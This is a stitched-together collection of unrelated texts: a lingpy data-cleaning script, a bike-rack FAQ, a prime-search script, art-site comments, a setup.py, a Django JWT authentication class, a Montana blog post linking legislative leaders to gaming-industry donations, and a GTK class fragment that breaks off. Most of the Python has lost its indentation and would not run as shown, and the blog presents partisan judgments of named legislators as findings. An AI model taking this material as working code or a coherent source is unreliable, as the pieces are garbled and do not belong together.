tk = tks.pop(0)
if tk[0] in numbersdown:
for a,b in zip(numbersdown,numbersup):
tk = tk.replace(a,b)
ntk += [tk]
# expand nasals
elif "\u0303" in tk or tk[0] in "ãũẽĩõ":
ntk += [tk,lingpy.rc('nasal_placeholder')]
else:
ntk += [tk]
db[k][db.header['tokens']] = ' '.join(ntk)
# same for ipa
ipa = db[k,'ipa']
        for a, b in zip(numbersdown, numbersup):
            ipa = ipa.replace(a, b)  # str.replace returns a new string; assign it back
        db[k][db.header['ipa']] = ipa
db._clean_cache()
# assemble cognate ids and align them again for bai
etd = db.get_etymdict(ref='cogid')
for k in etd:
    print("Carrying out alignment for {0}".format(k))
idxs = [idx[0] for idx in etd[k] if idx]
nidxs, alms = [], []
for idx in idxs:
alm = db[idx,'tokens']
sbg = db[idx,'subgroup']
if alm != '-' and alm and sbg=='Bai':
nidxs += [idx]
alms += [alm]
if alms:
msa = lingpy.Multiple(alms)
msa.lib_align()
for idx,alm in zip(nidxs,msa.alm_matrix):
db[idx][db.header['alignment']] = ' '.join(alm)
cidx = db._rowIdx
ignore = []
for k in db:
c = db[k, 'concept']
if c == 'to plant (grow)':
db[k][cidx] = 'to plant'
elif c == 'lie, rest':
if db[k,'ipa'] == '-' or db[k,'ipa'] == '':
ignore += [k]
elif c == 'to the dream':
db[k][cidx] = 'the dream'
elif c == 'to suck':
if db[k,'ipa'] == '-' or db[k,'ipa'] == '':
db[k][cidx] = 'to lick'
elif c == 'to work':
db[k][cidx] = 'the work'
# search for potential duplicates
dups = {}
for d in db.doculect:
# get data flat
idxs = db.get_list(doculect=d, flat=True)
tks = db.get_list(doculect=d, flat=True, entry='tokens')
# iterate over all tokens and search for identical words
dup = {}
for idx,tk in zip(idxs,tks):
if tk not in ['-','']:
try:
dup[tk] += [idx]
except KeyError:
dup[tk] = [idx]
for k in dup:
if k not in ['-','']:
if len(dup[k]) > 1:
basei = dup[k][0]
basec = db[basei,'concept']
base = '{0} ({1})'.format(basei, basec)
for idx in dup[k][1:]:
dups[idx] = base
for k in db:
if k not in dups:
dups[k] = ''
if db[k,'ipa'] == '0':
db[k][db.header['ipa']] = ''
db[k][db.header['tokens']] = ''
db.add_entries('duplicates', dups, lambda x: x)
# add line for duplicates
db.update('sinotibetan',verbose=True, delete=ignore)
|
Have a question about our Steadyrack vertical bike racks, shipping, returns, warranty policies or something else? You’ll most likely find the answer here. For all other concerns and enquiries, please get in touch with our Support team at [email protected].
Do all the racks pivot?
Yes – all of our racks pivot almost 160 degrees on the wall.
What is the function of the rear wheel bracket/rest?
The rear wheel rest/bracket is designed to work universally with all tyre widths, including fat tyres. Narrow tyres will generally sit deeper in the bracket than wider tyres. Your tyre only needs partial contact with the rest for it to perform its function and prevent the bike from swinging from side to side. We designed the rear wheel rest/bracket to complement the design of our racks, and we felt that a larger rest/bracket wasn’t necessary.
Why doesn’t my Steadyrack bike rack swivel/pivot easily?
Our bike racks can be quite stiff the first few times you use them. They should loosen after some use; if you find they are still not pivoting as required, you can follow this procedure. Steadyrack bike racks are assembled using a specific torque setting for the nuts that hold the central spine to the top and bottom mounting brackets. This setting gives sufficient tension to the pivot to ensure bikes can be loaded at any angle without the rack moving around excessively; the fibre washers we use provide this stiffening effect. When you remove the 2 plastic caps from the top and bottom, these nuts will become exposed. You can loosen both nuts to free up the rack’s movement, or equally tighten them to lock the rack into position.
Does the bike rack need to be at 90° to the wall when mounting & dismounting my bike?
No – you can load and unload your bike from our racks at various angles to the wall. Just be sure to line your bike up with the angle of the rack before pushing it in.
What colours do your bike racks come in?
Our Classic, Fender and Fat Racks all come in black only, however you can customise your rack using our wide range of coloured End Caps.
Can I lock my Steadyrack so that it stays in one position?
No – however it is possible to restrict the movement of the pivot. Simply remove the 2 end caps and tighten the 2 nuts that attach the central pivot bar to the mounting brackets. Be careful doing this and make sure your fixings are secure, as any sideways force will put extreme pressure on the mounting bracket fixings.
Will your bike racks work for small children’s bikes?
The smallest diameter wheels we recommend are 16 inches. Any smaller and the tyres won’t contact the two V-shaped cradling points in the rack – the forks will rest on the bars before the tyres connect with them, making the distance between the two Vs too great. We have had some success placing Velcro straps on the bottom arm to shorten the distance between the two points, but the bikes are not as stable, and you would need to strap the wheel to the upper arm of the rack with Velcro as well.
Is there any downside to using the Fender Rack versus the Classic Rack?
The only functional difference between these two racks is that the Fender Rack works for bikes both with and without fenders. There are two main reasons people choose the Classic over the Fender if they don’t have a bike with a fender: the first is security, as the plastic saddles are easier to cut, which is a potential problem in exposed environments; the second is price, as the Fender Rack is slightly more expensive.
What are your racks made from?
Our racks are made from steel and UV treated plastic.
Can I mount your bike racks onto the side of a van?
Yes – we use our racks for transporting bikes in a trailer to and from events, so this should work in the same way for a van. We tie the bikes down with Velcro straps and then fold them over the top of each other. We also wrap a long bungy cord across them so they don’t move around too much. They travel really well, cushioned by the front tyre, and as long as you don’t have any metal-to-metal contact you shouldn’t have any issues.
Can I hang my bike in a Steadyrack by its rear wheel, not the front wheel?
No – our racks won’t work with a rear wheel because of the derailleur and gears. One of the main features of our bike racks is the way you roll your bike in and out; there’s no lifting of the bike. It’s very easy to balance the bike on the rear wheel and push it forward until the front tyre engages with the rack. This would be difficult to do with the rear tyre in the rack and it wouldn’t sit well in the rack with the derailleur.
Which rack do I need for my bike?
To find the best suited rack for your bike, you will need to measure your wheel diameter and tyre width. You can learn more about these measurements here. Tyres wider than 2.4 inches will need a Fat Rack.
My tyre width is 2.4 inches. Will I need a Classic Rack or Fat Rack?
Make sure you’ve triple-checked this measurement. 2.4 inch wide tyres can fit into our Classic and Fender Racks, although they will be a snug fit. You can choose a Fat Rack for this tyre width, but the wheel will not fit as snugly. If you are unsure which rack to purchase, please feel free to contact our team.
Does the Fat Rack come with a different rear wheel support bracket/rest?
The rear wheel support bracket for the Fat Rack is the same size as those used for the Classic and Fender Racks. You may find that it won’t cradle your rear wheel entirely, but it will stabilise it and stop it from sliding out when pivoted, as it’s designed to do.
What is the minimum wheel diameter that will fit in a Steadyrack?
Our bike racks are suitable for bikes with wheel diameters between 20 and 29 inches. This is to ensure that the bike fits in the Steadyrack arms snugly, and safely. You can check your tyre size against our product information on this page.
What is the maximum tyre width that will fit in a Steadyrack?
The Classic and Fender Racks will accommodate tyres up to 2.4 inches wide and the Fat Rack will accommodate tyres up to 5 inches wide.
How far will my bike stick out from the wall when pivoted against the wall?
It really depends on the width of your handlebars, saddle height and pedals. The bike will fold until the handlebars touch the wall, though not quite to 90 degrees or flat against the wall. For a normal road bike bar we would generally allow about 90 cm (around 35 inches) from the wall, and for a MTB with wider bars around 100 cm (about 39 inches).
How do your bike racks avoid damaging carbon wheels?
One of the main features of our bike rack design is that it is the most suitable rack for carbon wheels. There is less pressure on the bike when it is in the rack than when riding it, and the Steadyrack won’t damage your wheels like hooks can. The wheel is cradled between the two V-shaped cradling points created when the arms are folded down, and the tyre cushions the wheel and bike. There should be absolutely no need to do any maintenance on your rims or wheels if you use a Steadyrack.
What comes with the Steadyrack bike rack?
1 plastic rear wheel rest/bracket which should be fixed to the wall in line with your rear wheel axle (see our installation instructions and videos for more information).
4 bolts and plugs for installing the rack.
2 smaller screws and plugs for the rear tyre rest/bracket.
There are 4 mounting holes on each mounting plate. You should only use two of these holes to fix your rack to the wall or frame. The two vertical aligned holes are for fixing to studs and the two horizontal aligned holes are for fixing into masonry.
How close together can I install my racks to each other?
The distance apart is very dependent on your individual situation. The racks can be spaced closer together by staggering the height of each rack to ensure the bikes’ handlebars and pedals do not clash. Alternatively, you can space them farther apart and utilise the pivot action to allow the bikes to move closer to the wall. You can learn more about spacing your racks with our Spacing Guide found on our Manuals page. We strongly recommend measuring your bikes first and then using our manuals as a guide.
What height can I mount my racks at?
The perfect mounting height is achieved when a bike is hanging in the rack and the rear wheel is close to the floor, but not touching. This ensures the least amount of rise to load the bike. Bikes will come in different lengths and therefore different mounting heights which is why we suggest measuring your bikes first by following our installation guide.
What type of walls can the racks be mounted to?
Our racks can be installed on almost all types of walls, including masonry, timber or steel framed, brick, or concrete. For timber framed or steel walls you must locate the framing first and check with your local hardware supplier for advice on the correct type of fixings for your wall type. For more installation information, please read our installation guides.
What if my studs aren’t where I want to put my racks?
No problem – you can fix rails across the studs at your preferred mounting height and then space your racks along the rails. Another option is to fix a sheet of 10mm ply across the top of your wall lining or studs and then screw your racks to the ply in the exact location you want them.
Will I need to buy fixings for my bike rack?
We provide fixings suitable for installing your Steadyrack bike racks onto timber and masonry. Should you need to install your rack onto a different surface (e.g. steel) then we recommend visiting your local hardware store for advice on suitable fixings.
Do I need to install the rear wheel bracket/rest?
Although we recommend installing the rear wheel bracket/rest with your Steadyrack bike rack, if circumstances prevent you from installing it, the rack will still perform as required. You may find that your rear wheel moves more than usual without the rest, but it’s not vital that it be installed.
What size masonry drill bit do I need for installing into brick?
You will need a 10mm masonry bit for the Steadyrack bike rack and a 6.5mm bit for the bottom bracket.
How do you mount a Steadyrack using the fixings provided?
The Steadyrack bike rack kit comes with 4 bolts and plugs for installing the rack and 2 smaller screws and plugs for the rear tyre rest/bracket. There are 4 mounting holes on each mounting plate. Use 2 of these holes only to fix your rack to the wall or frame. The two vertical aligned holes are for fixing to studs and the two horizontal aligned holes are for fixing into masonry.
Do I have to use all 4 fixing bolts provided?
Yes – we recommend that you use all 4 fixing bolts provided.
Can I install my Steadyrack bike racks outside?
Yes – you can hang your Steadyrack bike racks outside, however it’s not covered by our warranty.
Shipping times and deliveries vary depending on your country, region and location. Your estimated shipping delivery time will show at checkout; however, please keep in mind that these estimates may not take into account courier operating days, public holidays and other delivery parameters. Once you have placed your order online, it can take 1–2 business days to process your order.
A full list of our shipping countries and regions can be found here. If your country or region is not listed, please email our team at [email protected] to see how we can arrange sending our racks to your location.
We work hard to ensure that our Steadyrack bike racks are manufactured to the highest standard. However, if you find a fault or you are dissatisfied with your Steadyrack for any reason, please contact us at [email protected] so we can assist you further.
Is there a Warranty on the Steadyrack?
Yes – you can view our warranty information here.
Where can I buy Steadyrack in stores?
The easiest and most convenient way to order our bike racks is through our online store. Some retailers and dealers across the globe stock our bike racks; however, we cannot confirm what their stock levels might be.
Do you have distributors?
Yes – we do have a wide range of distributors. If you are interested in becoming a distributor for our Steadyrack bike racks, please visit this page.
Are Steadyrack bike racks safe to use for bikes with hydraulic brakes/forks/suspension?
Yes! This is a common concern for many bike owners with these types of brakes and suspension. When your bike is hung up vertically, the fluid in your forks will run towards the seals and keep them lubricated. This prolongs their life, so it’s actually good for your bike and forks to hang it vertically on our bike racks. If you have hydraulic brakes on your bike, the fluid will run down when the bike is hung, so we advise pumping the brakes a few times when you take the bike off the rack if it’s been there for a while. The shocks shouldn’t leak when the bike is hung up; if they do, it’s a good indication that the seals might need replacing.
Are your bike racks safe to use for aero/time-trial bikes?
Yes – however you will most likely need a Fender Rack. If you have an aero bike you will need to measure the gap between the down tube and tyre (you can see this measurement here). For most bikes this will be more than 10mm; if your distance is less than this, you will need a Fender Rack. This is because the rubber end on the Fender Rack can easily fit between your tyre and down tube and won’t damage your frame if it comes in contact with it.
What options exist for locking my bike onto your racks?
Your bikes can be locked through their frame and the 2 arms of our Steadyrack bike racks using either a D Lock or cable lock – this will depend on the type of bike you have. Remember that it’s always better to keep your bikes out of a visible location to avoid theft even if your bike is locked.
What bike storage solutions do you have for a commercial bike parking facility or project?
We have a wide variety of options for bike parking projects and end of trip facilities. For all enquiries of this kind, please contact our team. |
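# Sieve of Eratosthenes plus a digit-replacement search: for six-digit
# patterns, replacing every starred position with the same digit must
# yield eight primes (this mirrors Project Euler problem 51).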
def listprime(lp):
prime=[True]*lp
prime[0]=False
prime[1]=False
for x in range(lp):
if prime[x]:
bei=x+x
while bei<lp:
prime[bei]=False
bei+=x
return prime
def replaceStar(s):
result=[]
if '*' in s:
for n in range(0,9+1):
news = s.replace('*', str(n))
if news[0]!='0':
result.append(news)
else:
result.append(s)
return result
primes=listprime(10000000)
def countPrime(candidates):  # avoid shadowing the built-in name `list`
    result = []
    for s in candidates:
        if primes[int(s)]:
            result.append(s)
    return result
# print(countPrime(replaceStar('56**3')))
# print(countPrime(replaceStar('*3')))
def generate(g):
if g==0:
yield ''
return
for other in generate(g-1):
for first in '1234567890*':
yield first+other
for x in generate(6):
if len(countPrime(replaceStar(x)))==8:
        print(countPrime(replaceStar(x)))
|
Sorry for the poor quality, but I thought it'd be okay as a reference.
I used your wonderful stock here: [link] Thanks so much!
I just LOVE all of your work on this little foal!
You may have to sign up (sorry!) but it's the only way I could show you!
I adore this pose! I think the quality of the image is wonderful. Great work! |
from setuptools import setup, find_packages
from os import path
here = path.abspath(path.dirname(__file__))
long_description = """sweetmorse
----------
Morse code tools from read to write, analog to digital.
.. image:: https://www.travis-ci.org/Jdsleppy/sweetmorse.svg?branch=master
:target: https://www.travis-ci.org/Jdsleppy/sweetmorse
Compatibility
-------------
Targets Python 3, tested against Python 3.3-3.6.
More info
---------
See a crash course at https://github.com/Jdsleppy/sweetmorse
"""
setup(
name='sweetmorse',
# Versions should comply with PEP440. For a discussion on single-sourcing
# the version across setup.py and the project code, see
# https://packaging.python.org/en/latest/single_source_version.html
version='1.1.0',
description='Morse code tools from read to write, analog to digital',
long_description=long_description,
url='https://github.com/Jdsleppy/sweetmorse',
author='Joel Sleppy',
author_email='[email protected]',
license='MIT',
# See https://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=[
'Development Status :: 1 - Planning',
'Intended Audience :: Developers',
'Topic :: Software Development :: Libraries',
'Topic :: Communications :: Ham Radio',
'Topic :: Multimedia :: Sound/Audio',
# (should match "license" above)
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
],
keywords='morse signal electronics',
# You can just specify the packages manually here if your project is
# simple. Or you can use find_packages().
packages=find_packages(exclude=['tests']),
# List run-time dependencies here. These will be installed by pip when
# your project is installed. For an analysis of "install_requires" vs pip's
# requirements files see:
# https://packaging.python.org/en/latest/requirements.html
install_requires=[],
python_requires='~=3.0',
package_data={},
data_files=[],
entry_points={
'console_scripts': [
'sweetmorse = sweetmorse.main:main',
],
},
)
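# Once installed (e.g. `pip install sweetmorse`), the console_scripts entry
# point above exposes a `sweetmorse` command that dispatches to
# sweetmorse.main:main.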
|
Ready to take your Email Marketing to the next level so you can book and retain more clients from your inbox?
Success! Now check your email to access your free content!
Copyright © 2019 | Remedy Writing | Margo Carroll | All rights reserved. |
from django.utils.translation import ugettext_lazy as _
from django.core.exceptions import ValidationError
from rest_framework import authentication
from rest_framework.exceptions import AuthenticationFailed
from jwt.exceptions import TokenException
from jwt import BaseToken, compare, token_factory
from auth.models import UserProfile
from authtoken.settings import api_settings, secret_key
def get_token_instance(user_profile):
return token_factory(
api_settings.TOKEN_HEADER_CLAIMSET_CLASS,
api_settings.TOKEN_PAYLOAD_CLAIMSET_CLASS,
{
'payload': {'aud': api_settings.TOKEN_AUDIENCE or user_profile.id}
}
)
def validate_user(user):
"""Validates a user is active and can be used to authenticate.
"""
# From Django 1.10 onwards the `authenticate` call simply
# returns `None` for is_active=False users.
# (Assuming the default `ModelBackend` authentication backend.)
if not user.is_active:
raise ValidationError('User account is disabled.')
def authenticate_credentials(kwargs):
"""
Returns a UserProfile object from the given kwargs if the UserProfile object
exists and is valid. AuthTokenSerializer validates UserProfile object.
"""
try:
user_profile = UserProfile.objects.get(**kwargs)
except UserProfile.DoesNotExist:
        raise AuthenticationFailed('User does not exist')
try:
validate_user(user_profile.user)
except ValidationError as exc:
raise AuthenticationFailed(_(str(exc)))
return user_profile
class JSONWebTokenAuthentication(authentication.BaseAuthentication):
"""
JSON Web Token based authentication conforming to RFC 7519.
See https://jwt.io/introduction/ and https://openid.net/specs/draft-jones-json-web-token-07.html
for more about JWTs.
Clients should authenticate by passing the JWT token key in the "Authorization"
HTTP header, prepended with the string "Bearer ".
For example:
Authorization: Bearer eyJhbGciO.eyJzdWIiOiIxMjM0NTY3ODkwIiwib.TJVA95OrM7E2cBab3
"""
keyword = 'Bearer'
www_authenticate_realm = 'api'
def authenticate(self, request):
"""
Authenticate the request if the signature is valid and return a two-tuple of (user, token).
"""
auth = authentication.get_authorization_header(request).split()
if not auth or auth[0].lower() != self.keyword.lower().encode():
return None
token = self.validate_bearer(auth)
try:
# TODO Remove this, and don't verify audience as it is not
# verified yet.
user_profile = self.get_token_user(request, token)
if user_profile is not None:
token_instance = get_token_instance(user_profile)
# Verify token
if compare(token, token_instance, secret_key(),
api_settings.TOKEN_VERIFICATION_ALGORITHM_INSTANCE):
return (user_profile.user, token)
except AuthenticationFailed as exc:
raise AuthenticationFailed(_(str(exc) or 'Provided credentials invalid.'))
except TokenException as exc:
raise AuthenticationFailed(_(str(exc)))
def get_token_user(self, request, token):
"""Gets the user specified in the request headers or, more commmonly,
in the token payload itself.
"""
# Get username or user id in request headers
username = request.META.get('X_USERNAME')
user_id = request.META.get('HTTP_USER_ID') # ex. USER-ID: 100
payload = BaseToken.clean(token)[1]
user_profile = None
# Get user from username, user_id, or from token payload.
if username:
user_profile = authenticate_credentials({'user__username': username})
elif user_id:
user_profile = authenticate_credentials({'id': user_id})
elif payload.get('aud'):
user_profile = authenticate_credentials({'id': payload.get('aud')})
return user_profile
def validate_bearer(self, bearer):
"""Ensure the token passed through request headers is valid and is parsable.
If the token is not valid or not parsable, `AuthenticationFailed` is raised.
"""
if len(bearer) == 1:
msg = _('Invalid token header. No credentials provided.')
raise AuthenticationFailed(msg)
elif len(bearer) > 2:
msg = _('Invalid token header. Token string should not contain spaces.')
raise AuthenticationFailed(msg)
        try:
            token = bearer[1].decode()  # decode bytes; invalid bytes raise UnicodeError
except UnicodeError:
msg = _('Invalid token header. Token string should not contain invalid characters.')
raise AuthenticationFailed(msg)
return token
def authenticate_header(self, request):
"""Return a string to be used as the value of the `WWW-Authenticate`
header in a `401 Unauthenticated` response, or `None` if the
authentication scheme should return `403 Permission Denied` responses.
"""
return '{0} realm="{1}"'.format(self.keyword, self.www_authenticate_realm)
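# Illustrative DRF settings enabling this class; the dotted path below is an
# assumption -- adjust it to wherever this module lives in your project:
#
# REST_FRAMEWORK = {
#     'DEFAULT_AUTHENTICATION_CLASSES': (
#         'authtoken.authentication.JSONWebTokenAuthentication',
#     ),
# }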
|
Whose Pocket is Montana’s Legislative Leadership Team In?
How the system works is that individuals and political committees donate to candidates.
When those candidates win and take office and head to Helena for the legislature, those individuals and committees become lobbyists.
Oh, they don’t do it themselves – don’t be silly!
No, they pay other people to lobby for them. You can spot these lobbyists a mile away – shiny shoes and fancy suits and smelling like they spilled the bottle of cologne all over themselves. And God…those smiles.
So we have rather nefarious people buying-off candidates with political contributions (legalized bribes) before they get elected, and then buying them off with lobbyists after they take office.
This is how our system works.
My goal today was to dig into the finance reports of the 20 members of the 150-member 2019 Legislature to see which individuals and committees bought them off before they were elected, with the goal of ascertaining whose interests those ‘leaders’ will be working toward over the next four months of chaos in Helena.
I have to admit, I went in with an agenda.
I wanted to see how many candidates took money from healthcare-related groups…candidates who – once elected – would be voting to either continue or end Medicaid expansion in Montana, something we typically refer to as Obamacare.
My agenda was dashed quickly, as it became quite apparent that healthcare wasn’t the industry most interested in swaying the legislature.
So let’s get into the candidates so you can see for yourself, and then I’ll give you a short conclusion based on history.
Let’s start with the leadership of the Montana Senate.
Scott Sales is the GOP president of the Montana Senate, and in a way, one of the top dogs of the whole 2019 Legislature.
He took money from Charter, Northwestern Energy, BP North America, the Association of Montana Troopers, the Montana Land Surveyor’s PAC, Montana Wood Products Association, Motorola, MDU Resources (an infrastructure group), and BackPAC (a group that mostly gives to congressional democrats).
Other groups include Health Care Services Corporation Employees’ PAC, Montana Independent Bankers, and Weyerhaeuser…which bought Plum Creek Timber in 2016 for $8.4 billion. That means the company took control of the 6 million acres Plum Creek had, including the 770,000 acres here in Montana. Weyerhaeuser now owns over 12 million acres of timberland in the US, making it a huge business, and political lobby.
When it comes to individuals that are donating to him, we’re really interested in what business they’re in. For instance, we see that the president of Century Gaming based out of Billings is donating to him.
As a quick aside…Elsie Arntzen’s husband, Steve Arntzen, is the president and CEO of Century Gaming. Elsie ran for and won the OPI spot in 2016, and I find the fact that Elsie’s husband donated $230 to the now-president of the Montana Senate – and the fact that he in turn donated $790 to Elsie in August 2016 – to be quite questionable ethically.
Other gaming interests that gave Sales money include route operators for Golden Gaming as well as Rocky Mountain Gaming. Besides that we see lots of attorneys giving to this man, as well as an executive from Chevron and the vice president of Plum Creek. Clearly, he’s in the gaming lobby’s pocket most of all, though timber is coming very close.
Here are some other members of the legislative leadership team.
Mark Blasdel: This guy has finance reports dating back to 2008, but in the 2018 report what stood out to me was the number of individuals associated with or employed by the gaming industry. We have Century Gaming & Technology, Diamond Jim’s owners, Dotty’s Casino owners, Nickel’s Casino route operators, Town Pump route operators and many more. Clearly, Blasdel is in the gambling lobby’s pocket.
Fred Thomas: The architect of Montana deregulation has reports going back to the year 2000. We’ll focus on his 2016 reports. Mostly, Thomas is getting his money from ranchers and retired people. He also gets a lot from the gaming industry, including the Gaming Industry Association. Another contribution came from Montanans for Affordable Housing. Thomas will likely vote against Medicaid expansion, but he has taken a lot from nursing industry workers, doctors, medical consultants, as well as Consumer Direct Care Network…a group that represents over 27,000 care workers. This guy’s in both the gaming industry’s and the medical lobby’s pockets.
Cary Smith: This guy has reports going back to 2008, but we’ll focus on 2018’s. Lots of gaming business owners gave him money. Big committees giving him money include Charter, Ash Grove Cement, Montana Action Committee for Rural Electrification, Conoco Philips, CVS Health, and a property insurance group. The CEO of the Montana Medical Association gave him money. This man is in the rural infrastructure lobby’s pocket.
Steve Fitzpatrick: We have to go back to 2016 to get reports for this guy, and we see that lots of gaming industry folks gave him money, as well as the vice president of Blue Cross Blue Shield and the CEO of Benefis, as well as that company’s vice president and COO. Both an attorney and the chief of staff of the Montana Department of Justice gave him money. Leaning toward the medical lobby’s pocket.
Jon Sesso: Now we’ll get to the democrats, and this man has reports going back to 2006. His latest is from 2016. He took from GlaxoSmithKline, Weyerhaeuser, BNSF, Charter, Motorola, Phillips 66, route operators for Golden Gaming and Rocky Mountain Gaming, as well as the CEO of Golden Gaming and that company’s manager. Mostly, this dem is in the gaming lobby’s pocket.
Jennifer Pomnichowski: This woman has reports going back to 2010, but we’ll focus on 2018. She took from Charter, Trout Unlimited, the VP of Distributed Gaming for Golden Entertainment, and that company’s CEO. This woman is in the gaming lobby’s pocket.
Margie MacDonald: This woman has reports going back to 2012, but we’ll focus on 2016. She took from Carol’s List, Charter, attorneys, and lots of people who don’t have a job. Employees of Zinc Air, Inc. were big contributors. The governor even contributed. Honestly, the amount of “not employed” I see listed in her reports is alarming, and I’m not able to pinpoint which industry bought her off.
Let’s switch gears and look at the leadership of the Montana House.
Greg Hertz: This guy has reports going back to 2012, but we’ll focus on 2018. The owners of Town Pump gave him a lot across multiple finance reports. He took from the executive director of the Gaming Industries Association of Montana and the CEO of Century Gaming, as well as that company’s CFO. Optometrists gave him a lot. Golden Gaming is another big contributor. Clearly, this man’s in the gaming lobby’s pocket.
Wylie Galt: This Republican took from the BCBS Health Care Service Corp. Employees PAC, the Montana Beer and Wine Distributors Association, the Wood Products Association, and Weyerhaeuser. I’d put him in the timber lobby’s pocket.
Brad Tschida: This Republican took from Northwestern Energy, bankers, insurance folks, and storage business owners. Doctors gave him a lot, as did retired folks and business owners. Greg Gianforte kicked some money his way, as did a Las Vegas gaming business person. I’m not able to pigeonhole which industry pocket he’s in.
Becky Beard: This Republican took from Northwestern Energy and Weyerhaeuser. She got cash from the director of the Montana Tavern Association twice and the directors of Town Pump several times. The executive director of the Gaming Industry Association of Montana donated. Conoco Philips, CVS Health, and Montanans for Affordable Housing PAC all gave her money. The CEO of Century Gaming donated, as did the managing director of Grand Vision Gaming. This woman is clearly in the gaming lobby’s pocket.
Dennis Lenz: This guy has reports going back to 2010, but we’ll focus on 2018. Northwestern Energy gave him money, as did Greg Gianforte and a couple of optometrists. Besides that, workers from Rocky Mountain Gaming, Golden Entertainment and Golden Gaming all gave him money. He’s in the gaming lobby’s pocket.
Derek Skees: This guy took money from Century Link, consultants, retired people, Greg Gianforte, and the owner of Golden Entertainment in Las Vegas. To me, he’s rather clean…but he is still taking gaming money so I’ll also put him in the gaming lobby’s pocket.
Seth Berglee: He takes money from the Montana Beer & Wine Distributors Association, the Blue Cross Blue Shield of Montana PAC, Charter, Century Link, Weyerhaeuser, lots of retired people, Tim Fox, and fellow legislative leadership team members, Greg Hertz and Brad Tschida, as well as Theresa Manzella. I’d put this guy in the telecom’s pocket.
Casey Schreiner: This democrat took money from Magellan Health Services Employee Committee, Northwestern Energy, Steve Arntzen of Century Gaming, the managing director of Grand Vision Gaming, and the CEO of Century Gaming. He took from lots of retired people and teachers, lots of tavern owners, the owner of Nickel’s Casino and Town Pump, and the head of the gaming industry association. He also took money from fellow leadership team members Kim Abbott and Shane Morigeau. This guy is in the gaming lobby’s pocket.
Shane Morigeau: This Democrat took from the Montana Troopers PAC, Northwestern Energy, Weyerhaeuser, Charter, the owner of Town Pump, lots of attorneys, the president of Century Gaming, the manager of Grand Vision Gaming, the general manager of Century Gaming, and fellow leadership team member Casey Schreiner. I’d have to put this guy in the gaming lobby’s pocket.
Kim Abbott: She took from the Montana Trooper PAC, a couple of Missoula PACs, and the owner of Golden Gaming and Entertainment. She’s pretty clean.
Denise Hayman: This person didn’t raise or spend any money that I can see.
Laurie Bishop: This woman took from Carol’s List, some Missoula PACs, MT Med PAC, retired people, and the owner of Golden Gaming Entertainment in Las Vegas. For the most part, this woman is pretty clean.
Of the 20 members of the 2019 legislative leadership team, 11 of them are beholden to the gaming lobby.
Is that good, and if so…for whom (and why)?
I have to say…all of this talk of gaming in Montana got me thinking about our representative in Washington from 1961 to 1971, Arnold Olsen.
He was born in Butte during the Great War and worked in the machine shops and compressor plants of the Butte mines while taking breaks from law school in Missoula. He served in the Navy during WWII and got elected as Montana’s attorney general in 1948. At 33, he was the youngest AG in the country.
And boy, did he hate gambling!
He decried it, calling gambling operators “leeches living off the working man.” He didn’t just speak out, he took action. “He outlawed slot machines, accusing owners of escaping responsibilities as taxpayers while raking in $22 million annually.” Olsen argued that by getting rid of the slot machines the money was going to stay in Montana’s economy, not go out of state to wherever the “leeches” were from.
Because of his judiciousness in going after gambling, the 1951 Legislature didn’t appropriate any money to his office to “continue the anti-vice work.” Still, his reelection in 1952 proved he had the support of Montanans.
Olsen ran for governor and lost, but then got himself elected to a decade in Congress before fading from Montanans’ minds entirely. No one today remembers him.
Few know anything about gambling, either, or the money it brings in.
In 2015, the 16,000 video gambling machines in Montana produced $398 million in revenue for their owners, or about $24,000 a machine.
This in turn brought in $60 million to the state’s general fund via taxes (the tax rate is 15%).
Live bingo and keno don’t even come close, generating just $7,000 in taxes per year based on the 1% tax they pay.
So we’re bringing in at least $60 million a year in taxes from this; legislators want that money, and gaming industry folks don’t want to pay any more than that.
And it’s a lot more than it used to be. Back in 1994 the state and various counties saw $31 million in taxes come from the $505 million that gambling generated in the state ($444 million from video machines alone).
For over two decades now, the gaming industry has managed to lobby the legislature to keep their taxes low.
Is this good for Montanans?
Despite this revenue, many Montanans develop gambling problems, even addictions. It was estimated that “8,000 to 16,000 Montana residents have been problem gamblers at some point in their life,” according to a 1992 report.
What’s more, “another 3,500 to 11,500 Montanans may have been pathological gamblers.” The studies also revealed that the “percentage of female problem and pathological gamblers” was higher than any of the other states in the 8-state study.
No wonder Olsen called ’em leeches. They don’t get a lot of attention, either. It’s not like kicking an old person out of their nursing home. No, gambling works a slower kind of rot on individuals and families, a level of decay that can take years or decades to fully manifest itself.
To our legislative ‘leadership’ team, however, gambling and those who push it are a good source of income…both for the state and for their campaigns.
The gaming industry has the legislature in its pocket more than any other industry.
Is this good for Montana?
Well done. I'm glad you're back in your blogging chair.
I got a couple emails saying about the same, thanks! |
# -*- coding: utf-8 -*-
# [HARPIA PROJECT]
#
#
# S2i - Intelligent Industrial Systems
# DAS - Automation and Systems Department
# UFSC - Federal University of Santa Catarina
# Copyright: 2006 - 2007 Luis Carlos Dill Junges ([email protected]), Clovis Peruchi Scotti ([email protected]),
# Guilherme Augusto Rutzen ([email protected]), Mathias Erdtmann ([email protected]) and S2i (www.s2i.das.ufsc.br)
# 2007 - 2009 Clovis Peruchi Scotti ([email protected]), S2i (www.s2i.das.ufsc.br)
#
#
# This program is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License version 3, as published
# by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranties of
# MERCHANTABILITY, SATISFACTORY QUALITY, or FITNESS FOR A PARTICULAR
# PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program. If not, see <http://www.gnu.org/licenses/>.
#
# For further information, check the COPYING file distributed with this software.
#
# ----------------------------------------------------------------------
import gtk
from harpia.GladeWindow import GladeWindow
from harpia.s2icommonproperties import S2iCommonProperties, APP, DIR
# i18n
import os
from harpia.utils.XMLUtils import XMLParser
import gettext
_ = gettext.gettext
gettext.bindtextdomain(APP, DIR)
gettext.textdomain(APP)
# ----------------------------------------------------------------------
class Properties(GladeWindow, S2iCommonProperties):
# ----------------------------------------------------------------------
def __init__(self, PropertiesXML, S2iBlockProperties):
self.m_sDataDir = os.environ['HARPIA_DATA_DIR']
filename = self.m_sDataDir + 'glade/rotate.ui'
self.m_oPropertiesXML = PropertiesXML
self.m_oS2iBlockProperties = S2iBlockProperties
widget_list = [
'Properties',
'isAtCenter',
'isAtPoint',
'isScalling',
'isFilling',
'xC',
'yC',
